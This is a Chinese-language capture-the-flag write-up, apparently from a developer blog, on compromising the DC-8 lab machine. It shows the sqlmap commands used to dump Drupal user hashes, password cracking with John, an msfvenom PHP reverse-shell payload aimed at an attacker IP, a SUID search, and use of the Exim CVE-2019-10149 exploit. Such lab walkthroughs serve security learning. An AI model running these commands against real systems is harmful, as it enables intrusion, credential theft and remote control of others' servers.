前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >靶机渗透DC-8

靶机渗透DC-8

原创
作者头像
HipHip
修改2020-04-21 14:24:35
3850
修改2020-04-21 14:24:35
举报
文章被收录于专栏:靶机渗透靶机渗透

扫描下。

001
001

发现开了SSH。

访问网站,还是Drupal,Dirsearch扫描一波。

002
002
003
003

都看看,有什么信息。

看到个创建数据库的txt文件。

004
004

也没什么用处,还是在网站上转转吧。

005
005

看到这个参数很可疑啊,单引号看看。

006
006

报错了,直接SQLMap跑。

代码语言:javascript
复制
sqlmap -u http://192.168.70.164/?nid=1 --dbs
sqlmap -u http://192.168.70.164/?nid=1 -D d7db --tables
sqlmap -u http://192.168.70.164/?nid=1 -D d7db -T users --columns
sqlmap -u http://192.168.70.164/?nid=1 -D d7db -T users -C name,pass --dump

007
007
008
008
009
009
010
010

john爆破。

011
011

爆到了john账户的密码。

登陆。

012
012
013
013

在这里找到了可以使用PHP代码的地方。

msf反弹Sehll

代码语言:javascript
复制
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.154 LPORT=3333 -f raw

选择PHP之后,回到view界面填入刚才的Shell代码,提交。

014
014

成功连接。

代码语言:javascript
复制
python -c "import pty;pty.spawn('/bin/bash')"//获得交互式Shell

015
015
代码语言:javascript
复制
find / -perm -4000 2>/dev/null//查找具有SUID权限的文件

016
016
代码语言:javascript
复制
exim --version  //查看exim信息

017
017

看一下有写入权限的目录。

018
018

用到的是CVE-2019-10149

用的时候出现一直失败,重新Shell一下还是不行,后来上网查是直接用netcat方式。

019
019

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档